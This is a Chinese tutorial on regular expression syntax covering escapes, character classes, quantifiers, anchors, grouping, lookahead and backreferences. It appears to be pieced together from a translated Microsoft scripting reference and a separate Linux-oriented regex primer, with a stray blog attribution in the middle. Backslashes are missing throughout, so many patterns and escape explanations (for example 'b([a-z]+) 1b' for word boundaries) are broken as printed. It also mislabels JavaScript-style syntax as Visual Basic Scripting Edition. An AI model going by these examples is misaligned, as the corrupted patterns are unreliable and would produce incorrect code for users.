构造正则表达式的方法和创建数学表达式的方法一样。也就是用多种元字符与操作符将小的表达式结合在一起来创建更大的表达式。
可以通过在一对分隔符之间放入表达式模式的各种组件来构造一个正则表达式。对 Visual Basic Scripting Edition 而言,分隔符为一对正斜杠 (/) 字符。例如:
/expression/
对 VBScript 而言,则采用一对引号 ("") 来确定正则表达式的边界。例如:
"expression"
在上面所示的两个示例中,正则表达式模式 (expression) 均存储在RegExp 对象的Pattern 属性中。
正则表达式的组件可以是单个的字符、字符集合、字符范围、字符间的选择或者所有这些组件的任意组合。
--------------------------------------------------------------------------------
5.
优先权顺序
在构造正则表达式之后,就可以象数学表达式一样来求值,也就是说,可以从左至右并按照一个优先权顺序来求值。
下表从最高优先级到最低优先级列出各种正则表达式操作符的优先权顺序:
操作符 描述
转义符
(), (?, (?=), [] 圆括号和方括号
*, +, ?, {n}, {n,}, {n,m} 限定符
^, $, anymetacharacter 位置和顺序
| “或”操作
--------------------------------------------------------------------------------
6.
普通字符
普通字符由所有那些未显式指定为元字符的打印和非打印字符组成。这包括所有的大写和小写字母字符,所有数字,所有标点符号以及一些符号。
最简单的正则表达式是一个单独的普通字符,可以匹配所搜索字符串中的该字符本身。例如,单字符模式 'A' 可以匹配所搜索字符串中任何位置出现的字母 'A'。这里有一些单字符正则表达式模式的示例:
/a/
/7/
/M/
等价的 VBScript 单字符正则表达式为:
"a"
"7"
"M"
可以将多个单字符组合在一起得到一个较大的表达式。例如,下面的 Visual Basic Scripting Edition 正则表达式不是别的,就是通过组合单字符表达式 'a'、'7'以及 'M' 所创建出来的一个表达式。
/a7M/
等价的 VBScript 表达式为:
"a7M"
请注意这里没有连接操作符。所需要做的就是将一个字符放在了另一个字符后面。
--------------------------------------------------------------------------------
特殊字符
有不少元字符在试图对其进行匹配时需要进行特殊的处理。要匹配这些特殊字符,必须首先将这些字符转义,也就是在前面使用一个反斜杠 ()。下表给出了这些特殊字符及其含义:
特殊字符 说明
$ 匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 'n' 或 'r'。要匹配 $ 字符本身,请使用 $。
( ) 标记一个子表达式的开始和结束位置。子表达式可以获取供以后使用。要匹配这些字符,请使用 ( 和 )。
* 匹配前面的子表达式零次或多次。要匹配 * 字符,请使用 *。
+ 匹配前面的子表达式一次或多次。要匹配 + 字符,请使用 +。
. 匹配除换行符 n之外的任何单字符。要匹配 .,请使用 。
[ 标记一个中括号表达式的开始。要匹配 [,请使用 [。
? 匹配前面的子表达式零次或一次,或指明一个非贪婪限定符。要匹配 ? 字符,请使用 ?。
将下一个字符标记为或特殊字符、或原义字符、或后向引用、或八进制转义符。例如, 'n' 匹配字符 'n'。'n' 匹配换行符。序列 '' 匹配 "",而 '(' 则匹配 "("。
^ 匹配输入字符串的开始位置,除非在方括号表达式中使用,此时它表示不接受该字符集合。要匹配 ^ 字符本身,请使用 ^。
{ 标记限定符表达式的开始。要匹配 {,请使用 {。
| 指明两项之间的一个选择。要匹配 |,请使用 |。
--------------------------------------------------------------------------------
7.
非打印字符
有不少很有用的非打印字符,偶尔必须使用。下表显示了用来表示这些非打印字符的转义序列:
字符 含义
cx 匹配由x指明的控制字符。例如, cM 匹配一个 Control-M 或回车符。 x 的值必须为 A-Z 或 a-z 之一。否则,将 c 视为一个原义的 'c' 字符。
f 匹配一个换页符。等价于 x0c 和 cL。
n 匹配一个换行符。等价于 x0a 和 cJ。
r 匹配一个回车符。等价于 x0d 和 cM。
s 匹配任何空白字符,包括空格、制表符、换页符等等。等价于 [ fnrtv]。
S 匹配任何非空白字符。等价于 [^ fnrtv]。
t 匹配一个制表符。等价于 x09 和 cI。
v 匹配一个垂直制表符。等价于 x0b 和 cK。
--------------------------------------------------------------------------------
8.
字符匹配
句点 (.) 匹配一个字符串中任何单个的打印或非打印字符,除了换行符 (n) 之外。下面的 Visual Basic Scripting Edition 正则表达式可以匹配 'aac'、'abc'、'acc'、'adc'如此等等,同样也可以匹配 'a1c'、'a2c'、a-c'以及 a#c':
/a.c/
等价的 VBScript 正则表达式为:
"a.c"
如果试图匹配一个包含文件名的字符串,其中句点 (.) 是输入字符串的一部分,则可以在正则表达式中的句点前面加上一个反斜杠 () 字符来实现这一要求。举例来说,下面的 Visual Basic Scripting Edition 正则表达式就能匹配 'filename.ext':
/filename.ext/
对 VBScript 而言,等价的表达式如下所示:
"filename.ext"
这些表达式仍然是相当有限的。它们只允许匹配任何单字符。很多情况下,对从列表中匹配特殊字符十分有用。例如,如果输入文字中包含用数字表示为Chapter 1, Chapter 2诸如此类的章节标题,你可能需要找到这些章节标题。
括号表达式
可以在一个方括号 ([ 和 ]) 中放入一个或多个单字符,来创建一个待匹配的列表。如果字符被放入括号中括起来,则该列表称为括号表达式。括号内和其他任何地方一样,普通字符代表其本 身,也就是说,它们匹配输入文字中出现的一处自己。大多数特殊字符在位于括号表达式中时都将失去其含义。这里有一些例外:
']' 字符如果不是第一项,则将结束一个列表。要在列表中匹配 ']' 字符,请将其放在第一项,紧跟在开始的 '[' 后面。
'' 仍然作为转义符。要匹配 '' 字符,请使用 ''。
括号表达式中所包含的字符只匹配该括号表达式在正则表达式中所处位置的一个单字符。下面的 Visual Basic Scripting Edition 正则表达式可以匹配 'Chapter 1'、'Chapter 2'、'Chapter 3'、'Chapter 4' 以及 'Chapter 5':
/Chapter [12345]/
在 VBScript 中要匹配同样的章节标题,请使用下面的表达式:
"Chapter [12345]"
请注意单词 'Chapter' 及后面的空格与括号内的字符的位置关系是固定的。因此,括号表达式只用来指定满足紧跟在单词 'Chapter' 和一个空格之后的单字符位置的字符集合。这里是第九个字符位置。
如果希望使用范围而不是字符本身来表示待匹配的字符,则可以使用连字符将该范围的开始和结束字符分开。每个字符的字符值将决定其在一个范围内的相对顺序。 下面的 Visual Basic Scripting Edition 正则表达式包含了一个等价于上面所示的括号列表的范围表达式。
/Chapter [1-5]/
VBScipt 中相同功能的表达式如下所示:
"Chapter [1-5]"
如果以这种方式指定范围,则开始和结束值都包括在该范围内。有一点特别需要注意的是,在 Unicode 排序中起始值一定要在结束值之前。
如果想在括号表达式中包括连字符,则必须使用下述方法之一:
使用反斜杠将其转义:
[-]
将连字符放在括号列表的开始和结束位置。下面的表达式能匹配所有的小写字母和连字符:
[-a-z]
[a-z-]
创建一个范围,其中开始字符的值小于连字符,而结束字符的值等于或大于连字符。下面两个正则表达式都满足这一要求:
[!--]
[!-~]
同样,通过在列表开始处放置一个插入符(^),就可以查找所有不在列表或范围中的字符。如果该插入符出现在列表的其他位置,则匹配其本身,没有任何特殊含 义。下面的 Visual Basic Scripting Edition 正则表达式匹配章节号大于 5 的章节标题:
/Chapter [^12345]/
对 VBScript 则使用:
"Chapter [^12345]"
在上面所示的示例中,表达式将匹配第九个位置处除1, 2, 3, 4, or 5 之外的任何数字字符。因此, 'Chapter 7' 为一个匹配,同样 'Chapter 9' 也是如此。
上面的表达式可以使用连字符 (-) 表示。对 Visual Basic Scripting Edition 为:
/Chapter [^1-5]/
或者,对 VBScript 为:
"Chapter [^1-5]"
括号表达式的典型用法是指定对任何大写或小写字母字符或任何数字的匹配。下面的 Visual Basic Scripting Edition 表达式给出了这一匹配:
/[A-Za-z0-9]/
等价的 VBScript 表达式为:
"[A-Za-z0-9]"
9.
限定符
有时候不知道要匹配多少字符。为了能适应这种不确定性,正则表达式支持限定符的概念。这些限定符可以指定正则表达式的一个给定组件必须要出现多少次才能满足匹配。
下表给出了各种限定符及其含义的说明:
字符 描述
* 匹配前面的子表达式零次或多次。例如,zo* 能匹配 "z" 以及 "zoo"。 * 等价于{0,}。
+ 匹配前面的子表达式一次或多次。例如,'zo+' 能匹配 "zo" 以及 "zoo",但不能匹配 "z"。+ 等价于 {1,}。
? 匹配前面的子表达式零次或一次。例如,"do(es)?" 可以匹配 "do" 或 "does" 中的"do" 。? 等价于 {0,1}。
{n} n 是一个非负整数。匹配确定的 n 次。例如,'o{2}' 不能匹配 "Bob" 中的 'o',但是能匹配 "food" 中的两个 o。
{n,} n 是一个非负整数。至少匹配n 次。例如,'o{2,}' 不能匹配 "Bob" 中的 'o',但能匹配 "foooood" 中的所有 o。'o{1,}' 等价于 'o+'。'o{0,}' 则等价于 'o*'。
{n,m} m 和 n 均为非负整数,其中n <= m。最少匹配 n 次且最多匹配 m 次。刘, "o{1,3}" 将匹配 "fooooood" 中的前三个 o。'o{0,1}' 等价于 'o?'。请注意在逗号和两个数之间不能有空格。
对一个很大的输入文档而言,章节数很轻易就超过九章,因此需要有一种方法来处理两位数或者三位数的章节号。限定符就提供了这个功能。下面的Visual Basic Scripting Edition 正则表达式可以匹配具有任何位数的章节标题:
/Chapter [1-9][0-9]*/
下面的 VBScript 正则表达式执行同样的匹配:
"Chapter [1-9][0-9]*"
请注意限定符出现在范围表达式之后。因此,它将应用于所包含的整个范围表达式,在本例中,只指定了从 0 到 9 的数字。
这里没有使用 '+' 限定符,因为第二位或后续位置上并不一定需要一个数字。同样也没有使用 '?' 字符,因为这将把章节数限制为只有两位数字。在 'Chapter' 和空格字符之后至少要匹配一个数字。
如果已知章节数限制只有99 章,则可以使用下面的 Visual Basic Scripting Edition 表达式来指定至少有一位数字,但不超过两个数字。
/Chapter [0-9]{1,2}/
对 VBScript 可以使用下述正则表达式:
"Chapter [0-9]{1,2}"
上述表达式的缺点是如果有一个章节号大于 99,它仍只会匹配前两位数字。另一个缺点是某些人可以创建一个 Chapter 0,而且仍能匹配。一个更好的用来匹配两位数的 Visual Basic Scripting Edition 表达式如下:
/Chapter [1-9][0-9]?/
或者
/Chapter [1-9][0-9]{0,1}/
对 VBScript 而言,下述表达式与上面等价:
"Chapter [1-9][0-9]?"
或者
"Chapter [1-9][0-9]{0,1}"
'*'、 '+'和 '?' 限定符都称之为贪婪的,也就是说,他们尽可能多地匹配文字。有时这根本就不是所希望发生的情况。有时则正好希望最小匹配。
例如,你可能要搜索一个 HTML 文档来查找一处包含在 H1 标记中的章节标题。在文档中该文字可能具有如下形式:
<H1>Chapter 1 – Introduction to Regular Expressions</H1>
下面的表达式匹配从开始的小于号 (<) 到 H1 标记结束处的大于号之间的所有内容。
/<.*>/
VBScript 的正则表达式为:
"<.*>"
如果所要匹配的就是开始的 H1 标记,则下述非贪婪地表达式就只匹配 <H1>。
/<.*?>/
或者
"<.*?>"
通过在 '*'、 '+' 或 '?' 限定符后放置 '?',该表达式就从贪婪匹配转为了非贪婪或最小匹配。
10..
定位符
到现在为止,所看到的示例都只考虑查找任何地方出现的章节标题。出现的任何一个字符串 'Chapter' 后跟一个空格和一个数字可能是一个真正的章节标题,也可能是对其他章节的交叉引用。由于真正的章节标题总是出现在一行的开始,因此需要设计一个方法只查找 标题而不查找交叉引用。
定位符提供了这个功能。定位符可以将一个正则表达式固定在一行的开始或结束。也可以创建只在单词内或只在单词的开始或结尾处出现的正则表达式。下表包含了正则表达式及其含义的列表:
字符 描述
^ 匹配输入字符串的开始位置。如果设置了 RegExp 对象的 Multiline 属性,^ 也匹配 'n' 或 'r' 之后的位置。
$ 匹配输入字符串的结束位置。如果设置了RegExp 对象的 Multiline 属性,$ 也匹配 'n' 或 'r' 之前的位置。
b 匹配一个单词边界,也就是指单词和空格间的位置。
B 匹配非单词边界。
不能对定位符使用限定符。因为在一个换行符或者单词边界的前面或后面不会有连续多个位置,因此诸如 '^*' 的表达式是不允许的。
要匹配一行文字开始位置的文字,请在正则表达式的开始处使用 '^' 字符。不要把 '^' 的这个语法与其在括号表达式中的语法弄混。它们的语法根本不同。
要匹配一行文字结束位置的文字,请在正则表达式的结束处使用 '$' 字符。
要在查找章节标题时使用定位符,下面的 Visual Basic Scripting Edition 正则表达式将匹配位于一行的开始处最多有两个数字的章节标题:
/^Chapter [1-9][0-9]{0,1}/
VBScript 中相同功能的正则表达式如下:
"^Chapter [1-9][0-9]{0,1}"
一个真正的章节标题不仅出现在一行的开始,而且这一行中也仅有这一个内容,因此,它必然也位于一行的结束。下面的表达式确保所指定的匹配只匹配章节而不会匹配交叉引用。它是通过创建一个只匹配一行文字的开始和结束位置的正则表达式来实现的。
/^Chapter [1-9][0-9]{0,1}$/
对 VBScript 则使用:
"^Chapter [1-9][0-9]{0,1}$"
匹配单词边界有少许不同,但却给正则表达式增加了一个非常重要的功能。单词边界就是单词和空格之间的位置。非单词边界就是其他任何位置。下面的 Visual Basic Scripting Edition 表达式将匹配单词 'Chapter' 的前三个字符,因为它们出现在单词边界后:
/bCha/
对 VBScript 为:
"bCha"
这里 'b' 操作符的位置很关键。如果它位于要匹配的字符串的开始,则将查找位于单词开头处的匹配;如果它位于改字符串的末尾,则查找位于单词结束处的匹配。例如,下面的表达式将匹配单词 'Chapter' 中的 'ter',因为它出现在单词边界之前:
/terb/
以及
"terb"
下面的表达式将匹配 'apt',因为它位于 'Chapter' 中间,但不会匹配 'aptitude' 中的'apt':
/Bapt/
以及
"Bapt"
这是因为在单词 'Chapter' 中 'apt' 出现在非单词边界位置,而在单词 'aptitude' 中位于单词边界位置。非单词边界操作符的位置不重要,因为匹配与一个单词的开头或结尾无关。
11.
选择与编组
选择允许使用 '|' 字符来在两个或多个候选项中进行选择。通过扩展章节标题的正则表达式,可以将其扩充为不仅仅适用于章节标题的表达式。不过,这可没有想象的那么直接。在使 用选择时,将匹配'|' 字符每边最可能的表达式。你可能认为下面的 Visual Basic Scripting Edition 和 VBScript 表达式将匹配位于一行的开始和结束位置且后跟一个或两个数字的 'Chapter' 或 'Section':
/^Chapter|Section [1-9][0-9]{0,1}$/
"^Chapter|Section [1-9][0-9]{0,1}$"
不幸的是,真正的情况是上面所示的正则表达式要么匹配位于一行开始处的单词 'Chapter',要么匹配一行结束处的后跟任何数字的 'Section'。如果输入字符串为 'Chapter 22',上面的表达式将只匹配单词 'Chapter'。如果输入字符串为 'Section 22',则该表达式将匹配 'Section 22'。但这种结果不是我们此处的目的,因此必须有一种办法来使正则表达式对于所要做的更易于响应,而且确实也有这种方法。
可以使用圆括号来限制选择的范围,也就是说明确该选择只适用于这两个单词 'Chapter' 和 'Section'。不过,圆括号同样也是难处理的,因为它们也用来创建子表达式,有些内容将在后面关于子表达式的部分介绍。通过采用上面所示的正则表达 式并在适当位置添加圆括号,就可以使该正则表达式既可以匹配 'Chapter 1',也可以匹配 'Section 3'。
下面的正则表达式使用圆括号将 'Chapter' 和 'Section' 组成一组,所以该表达式才能正确工作。对 Visual Basic Scripting Edition 为:
/^(Chapter|Section) [1-9][0-9]{0,1}$/
对 VBScript 为:
"^(Chapter|Section) [1-9][0-9]{0,1}$"
这些表达式工作正确,只是产生了一个有趣的副产品。在 'Chapter|Section' 两边放置圆括号建立了适当的编组,但也导致两个待匹配单词之一都被捕获供今后使用。由于在上面所示的表达式中只有一组圆括号,因此只能有一个捕获的 submatch。可以使用 VBScript 的Submatches 集合或者Visual Basic Scripting Edition 中RegExp 对象的 $1-$9 属性来引用这个子匹配。
有时捕获一个子匹配是所希望的,有时则是不希望的。在说明所示的示例中,真正想做的就是使用圆括号对单词 'Chapter' 或 'Section' 之间的选择编组。并不希望在后面再引用该匹配。实际上,除非真的是需要捕获子匹配,否则请不要使用。由于不需要花时间和内存来存储那些子匹配,这种正则表 达式的效率将更高。
可以在正则表达式模式圆括号内部的前面使用 '?:'来防止存储该匹配供今后使用。对上面所示正则表达式的下述修改提供了免除子匹配存储的相同功能。对 Visual Basic Scripting Edition:
/^(?:Chapter|Section) [1-9][0-9]{0,1}$/
对 VBScript:
"^(?:Chapter|Section) [1-9][0-9]{0,1}$"
除了 '?:' 元字符,还有两个非捕获元字符用于称之为预查的匹配。一个为正向预查,用 ?= 表示, 在任何开始匹配圆括号内的正则表达式模式的位置来匹配搜索字符串。一个为负向预查,用 '?!' 表示,在任何开始不匹配该正则表达式模式的位置来匹配搜索字符串。
例如,假定有一个包含引用有 Windows 3.1、Windows 95、Windows 98 以及 Windows NT 的文档。进一步假设需要更新该文档,方法是查找所有对 Windows 95、Windows 98 以及 Windows NT 的引用,并将这些引用更改为 Windows 2000。可以使用下面的 Visual Basic Scripting Edition 正则表达式,这是一个正向预查,来匹配 Windows 95、Windows 98 以及 Windows NT:
/Windows(?=95 |98 |NT )/
在 VBScript 要进行同样的匹配可以使用下述表达式:
"Windows(?=95 |98 |NT )"
找到一个匹配后,紧接匹配到的文字(而不包括预查中使用的字符)就开始对下一次匹配的搜索。例如,如果上面所示的表达式匹配到 'Windows 98',则将从 'Windows' 而不是 '98' 之后继续查找。
--------------------------------------------------------------------------------
12.
后向引用
正则表达式一个最重要的特性就是将匹配成功的模式的某部分进行存储供以后使用这一能力。请回想一下,对一个正则表达式模式或部分模式两边添加圆括号将导致 这部分表达式存储到一个临时缓冲区中。可以使用非捕获元字符 '?:', '?=', or '?!' 来忽略对这部分正则表达式的保存。
所捕获的每个子匹配都按照在正则表达式模式中从左至右所遇到的内容存储。存储子匹配的缓冲区编号从 1 开始,连续编号直至最大 99 个子表达式。每个缓冲区都可以使用 'n' 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数。
后向引用一个最简单,最有用的应用是提供了确定文字中连续出现两个相同单词的位置的能力。请看下面的句子:
Is is the cost of of gasoline going up up?
根据所写内容,上面的句子明显存在单词多次重复的问题。如果能有一种方法无需查找每个单词的重复现象就能修改该句子就好了。下面的 Visual Basic Scripting Edition 正则表达式使用一个子表达式就可以实现这一功能。
/b([a-z]+) 1b/gi
等价的 VBScript 表达式为:
"b([a-z]+) 1b"
在这个示例中,子表达式就是圆括号之间的每一项。所捕获的表达式包括一个或多个字母字符,即由'[a-z]+' 所指定的。该正则表达式的第二部分是对前面所捕获的子匹配的引用,也就是由附加表达式所匹配的第二次出现的单词。'1'用来指定第一个子匹配。单词边界元 字符确保只检测单独的单词。如果不这样,则诸如 "is issued" 或 "this is" 这样的短语都会被该表达式不正确地识别。
在 Visual Basic Scripting Edition 表达式中,正则表达式后面的全局标志 ('g') 表示该表达式将用来在输入字符串中查找尽可能多的匹配。大小写敏感性由表达式结束处的大小写敏感性标记 ('i') 指定。多行标记指定可能出现在换行符的两端的潜在匹配。对 VBScript 而言,在表达式中不能设置各种标记,但必须使用 RegExp 对象的属性来显式设置。
使用上面所示的正则表达式,下面的 Visual Basic Scripting Edition 代码可以使用子匹配信息,在一个文字字符串中将连续出现两次的相同单词替换为一个相同的单词:
var ss = "Is is the cost of of gasoline going up up?.n";
var re = /b([a-z]+) 1b/gim; //创建正则表达式样式.
var rv = ss.replace(re,"$1"); //用一个单词替代两个单词.
最接近的等价 VBScript 代码如下:
Dim ss, re, rv
ss = "Is is the cost of of gasoline going up up?." & vbNewLine
Set re = New RegExp
re.Pattern = "b([a-z]+) 1b"
re.Global = True
re.IgnoreCase = True
re.MultiLine = True
rv = re.Replace(ss,"$1")
请注意在 VBScript 代码中,全局、大小写敏感性以及多行标记都是使用 RegExp 对象的适当属性来设置的。
在replace 方法中使用 $1 来引用所保存的第一个子匹配。如果有多个子匹配,则可以用 $2, $3 等继续引用。
后向引用的另一个用途是将一个通用资源指示符 (URI) 分解为组件部分。假定希望将下述的URI 分解为协议 (ftp, http, etc),域名地址以及页面/路径:
http://msdn.microsoft.com:80/scripting/default.htm
下面的正则表达式可以提供这个功能。对 Visual Basic Scripting Edition,为:
/(w+)://([^/:]+)(:d*)?([^# ]*)/
对 VBScript 为:
"(w+)://([^/:]+)(:d*)?([^# ]*)"
第一个附加子表达式是用来捕获该 web 地址的协议部分。该子表达式匹配位于一个冒号和两个正斜杠之前的任何单词。第二个附加子表达式捕获该地址的域名地址。该子表达式匹配不包括 '^'、 '/' 或 ':' 字符的任何字符序列。第三个附加子表达式捕获网站端口号码,如果指定了该端口号。该子表达式匹配后跟一个冒号的零或多个数字。最后,第四个附加子表达式捕 获由该 web 地址指定的路径以及或者页面信息。该子表达式匹配一个和多个除'#' 或空格之外的字符。
by clin003 from:http://clin003.com/或http://blog.csdn.net/cin003/
将该正则表达式应用于上面所示的 URI 后,子匹配包含下述内容:
RegExp.$1 包含 "http"
RegExp.$2 包含 "msdn.microsoft.com"
RegExp.$3 包含 ":80"
RegExp.$4 包含 "/scripting/default.htm"
正则表达式广泛出现在UNIX/Linux相关的各种领域和多种编程语言里。从常见的shell命令到大名鼎鼎的Perl语言再到当前非常流行的PHP, 它都扮演着一个重要的角色。甚至windows的命令行控制台也支持正则表达式。如果你是一个Linux服务器管理员,你经常会在一些服务器的设置脚本里 看到它。
可以说,它是学好Linux/UNIX必需掌握的一个知识点,否则你连Linux的启动脚本都读不懂。偏偏它又的确有点晦涩难懂,而且相关的资料又大 部分是英文,更为它的学习增加了几多困难。即使有些中文的翻译资料,不同的译者对一些术语的译法也五花八门,读着让人平添困惑。为此,我决定为它写一个简 明教程,尽量可以覆盖正则表达式涉及到的各主要概念。
我并不想把本文写成一本详细的正则表达式语法手册,事实上,这些手册已经存在了,不过读起来比较难懂。我希望的是在完成本教程后,你可以比较轻松的读 懂各种工具的正则表达式语法手册并可以迅速上手,不过要用好正则表达式,可不是一篇短短的教程可以解决的,那是无数实践练习的结果。但是,本文的最后一部 分对于正则表达式的编写提出了一些原则性的建议,学习一下这些正则表达式应用先驱者的经验会让我们在今后的实践中少走一些弯路。
正则表达式是英文“regular expressions”的译文,它的产生据说可以追溯到“神经网络”等比较高深的理论。那么什么是正则表达式呢?
正则表达式是从左向右去匹配目标字符串的一组模式。大多数字符在模式中表示它们自身并匹配目标中相应的字符。举个最简单的例子,模式“The quick brown fox”匹配了目标字符串中与其完全相同的一部分。
前面已经提过,正则表达式被许多植根于UNIX/Linux的工具采用,可是这些工具的正则表达式语法并不完全相同,它们中的一些对正则表达式语法的 扩展并不被其它工具识别,这也为正则表达式的使用增加了难度。因此,当你在一个具体的环境中使用正则表达式时,你还要先看一下目标环境支持的语法范围,以 确保你的正则表达式被正确的解析。
在本文中列举的例子里,我们用正斜线“/”做为模式的定界符(delimiter),一个模式用下面这种格式表示:
/[A-Z]+(abc|xyz)*/i
本文将较详细的阐明下面这些正则表达式概念:模式修正符(modifier),元字符(Meta-characters),子模式 (subpatterns)与逆向引用(Back references),重复(Repetition)和量词(quantifiers),断言(Assertions),注释,正则表达式中的递归,最 后我介绍一款方便学习正则表达式的工具并介绍一些正则表达式编写的思路。
正则表达式的模式修正符(modifier)
正则表达式的模式修正符主要用来限定模式与目标字符串的匹配方式,例如是否需要大小写敏感的匹配,是单行模式还是多行模式。修正符中的空格和换行被忽略,其它字符会导致错误。下面列举一些常见的模式修正符。注意,模式修正符是区分大小写的。
i:非大小写敏感模式,:如果设定此修正符,模式中的字符将同时匹配大小写字母。
m:多行模式,当设定了此修正符,“行起始”和“行结束”除了匹配整个字符串开头和结束外,还分别匹配其中的换行符的之后和之前。
s:单行模式,如果设定了此修正符,模式中的圆点元字符(.)匹配所有的字符,包括换行符。没有此设定的话,则不包括换行符。
对于多行模式和单行模式,一个容易让初学者迷惑的地方是这两者并不向字面上那样是互斥的。事实上,它们只是分别定义了英文句点(.)、音调符(^)和美元符($)这三个元字符的匹配方式,因此,单行模式与多行模式的修正符可以同时使用。
x:如果设定了此修正符,模式中的空白字符除了被转义的或在字符类中的以外完全被忽略,在未转义的字符类之外的 # 以及下一个换行符之间的所有字符,包括两头,也都被忽略。它使得可以在复杂的模式中加入注释。我们会在后面的部分更详细的讲解正则表达中的注释。
模式修正符还有很多,这里不再一一列举。我们会结合后面的内容介绍一些其它的模式修正符。不同的工具也可以添加自己的模式修正符,不过上面几最为常见。
模式修正符通常跟在模式定义结束符的后面,例如下面例子中模式最后的“i”字符。/[A-Z]+(abc|xyz)*/i,这时此修正符会对整个匹配 模式起作用。模式修正符也可以在模式内部通过包含在 "(?" 和 ")" 之间的修正符字母序列来实现。例如,(?im) 设定了不区分大小写,多行模式。也可以通过在字母前加上减号来取消这些选项。例如组合的选项 (?im-s),设定了不区分大小写和多行模式,并取消了单行模式。如果一个字母在减号之前与之后都出现了,则该选项被取消设定。
注意,如果(?im-s)出现在一个子模式内(被另一对小括号包含)会把模式修正符的作用局限在该子模式中。
正则表达式的元字符(Meta-characters)
正则表达式的威力在于其能够在模式中包含选择和循环。它们通过使用元字符来编码在模式中,元字符不代表其自身,它们用一些特殊的方式来解析。
有两组不同的元字符:一种是模式中除了方括号内都能被识别的,还有一种是在方括号内被识别的。如果想在模式里包含一个元字符本身,就需要用到转义符 号,正则表达式常用反斜线“”作为转义字符使用,为了匹配“”本身,你需要输入两个“”,向这样“”。当然,这个符号本身也是一个元字符。
方括号之外的元字符有这些:
有数种用途的通用转义符
^
断言目标的开头(或在多行模式下行的开头,即紧随一换行符之后)
$
断言目标的结尾(或在多行模式下行的结尾,即紧随一换行符之前)
.
匹配除了换行符外的任意一个字符(默认情况下)
[
字符类定义开始
]
字符类定义结束
|
开始一个多选一的分支
(
子模式开始
)
子模式结束
?
扩展 ( 的含义,我们已经在介绍模式修正符里看到过它的使用。它也可以是 0 或 1 数量限定符,以及数量限定符最小值
*
匹配 0 个或多个的数量限定符
+
匹配 1 个或多个的数量限定符
{
最少/最多数量限定开始
}
最少/最多数量限定结束
模式中方括号内的部分称为“字符类”。字符类中可用的元字符为:
通用转义字符
^
排除字符类,但仅当其为第一个字符时有效
-
指出字符范围
在这里,最值得一提是“”这个元字符。之所以重点对它进行讲解是因为这一个元字符有多种不同的用法,在不同情况下代表不同的含义,而且使用频率非常高,是个很容易让人迷惑的地方。
第一种用法前面我们已经提过,是作为通用转义字符使用,如果其后跟着一个非字母数字字符,则取消该字符可能具有的任何特殊含义。此种将反斜线用作转义字符的用法适用于无论是字符类之中还是之外。例如“”代表一个单独的反斜线“”。
第二种用途提供了一种在模式中以可见方式去编码不可打印字符的方法。模式中完全可以包括不可打印字符,除了代表模式结束的二进制零,例如,可以用 “a”代表alarm,即 BEL 字符(0x07),或用“cx”代表"control-x",其中 x 是任意字符。当然,这种方法表示的不一定非得是不可打印字符,实际上,可以用“xhh(十六进制代码为 hh 的字符)”和“ddd(八进制代码为 ddd 的字符)”来以编码的形式表达任何单字节字符,例如“�40”可以用来表示空格。
反斜线的第三个用法是指定通用字符类型,这些字符类型序列可以出现在字符类之中和之外。每一个匹配相应类型中的一个字符。如果当前匹配点在目标字符串的结尾,以上所有匹配都失败,因为没有字符可供匹配。有以下这些常见的通用字符类:
d 任一十进制数字
D任一非十进制数的字符
s任一空白字符
S任一非空白字符
w任一“字”的字符
W任一“非字”的字符
反斜线的第四个用法是某些简单的断言,关于断言的讨论我们放在后面,这里先不加讨论。
反斜线的最后一个用法是逆向引用。关于逆向引用,我们会在后面讨论逆向引用的部分来做进一步的讨论。
我们已经看到,反斜线的众多用法,其中一些涉及到了以后才讲的内容。我们在模式中遇到反斜线时一定要注意它具体是哪一种用途以免疑惑。
另外两个方括号也是非常重要的元字符,左方括号开始了一个字符类,右方括号结束之。单独一个右方括号不是特殊字符。字符类匹配目标中的一个字符,该字 符必须是字符类定义的字符集中的一个;除非字符类中的第一个字符是音调符(^),此情况下目标字符必须不在字符类定义的字符集中。如果在字符类中需要音调 符本身,则其必须不是第一个字符,或用反斜线转义。例如,[^A-Z]表式非大写字符。
其它元字符我们会在以后的文章中结合相关内容介绍。
【导读】在本文里,我们主要介绍子模式(subpatterns),逆向引用(Back references)和量词(quantifiers)
在上篇文章里,我们介绍了正则表达式的模式修正符与元字符,细心的读者也许会发现,这部分介绍的非常简略,而且很少有实际的例子的讲解。这主要是因为网上 现有的正则表达式资料都对这部分都有详细的介绍和众多的例子,如果觉得对前一部分缺乏了解可以参看这些资料。本文希望可以尽可能多涉及一些较高级的正则表 达式特性。
在本文里,我们主要介绍子模式(subpatterns),逆向引用(Back references)和量词(quantifiers),其中重点介绍对这些概念的一些扩展应用,例如子模式中的非捕获子模式,量词匹配时的greedy与ungreedy。
子模式(subpatterns)与逆向引用(Back references)
正则表达式可以包含多个字模式,子模式由圆括号定界,可以嵌套。这也是两个元字符“(”和“)”的作用。子模式可以有以下作用:
1. 将多选一的分支局部化。
例如,模式: cat(aract|erpillar|)匹配了 "cat","cataract" 或 "caterpillar" 之一,没有圆括号的话将匹配 "cataract","erpillar" 或空字符串。
2. 将子模式设定为捕获子模式(例如上面这个例子)。当整个模式匹配时,目标字符串中匹配了子模式的部分可以通过逆向引用进行调用。左圆括号从左到右计数(从 1 开始)以取得捕获子模式的数。
注意,子模式是可以嵌套的,例如,如果将字符串 "the red king" 来和模式 /the ((red|white) (king|queen))/进行匹配,捕获的子串为 "red king","red" 以及 "king",并被计为 1,2 和 3 ,可以通过“1”,“2”,“3”来分别引用它们,“1”包含了“2”和“3”,它们的序号是由左括号的顺序决定的。
在一些老的linux/unux工具里,子模式使用的圆括号需要用反斜线转义,向这种(subpattern),但现代的工具已经不需要了,本文中使用的例子都不进行转义。
非捕获子模式(non-capturing subpatterns)
用一对括号同时完成上面提到的子模式的两个功能有时会出现一些问题,例如,由于逆向引用的数目是有限的(通常最大不超过9),而且经常会遇到无需捕获 的子模式定义。这时,可以在开始的括号后加上问号和冒号来表示这个子模式无需捕获,就向下面这样(?:red|white) (king|queen))。
如果将“the white queen”作为模式匹配的目标字符串,则捕获的字串有“white queen”和“queen”,分别作为“1”和“2”,white虽然符合子模式“(?:red|white)”,但并不被捕获。
我们前面已经介绍过用括号与问号表示模式修正符的方法,为方便起见,如果需要在非捕获子模式中插入模式修正符,可以把它直接放在问号和冒号之间,例如,下面两个模式是等效的。
/(?i:saturday|sunday)/和/(??i)saturday|sunday)/。
逆向引用(Back references)
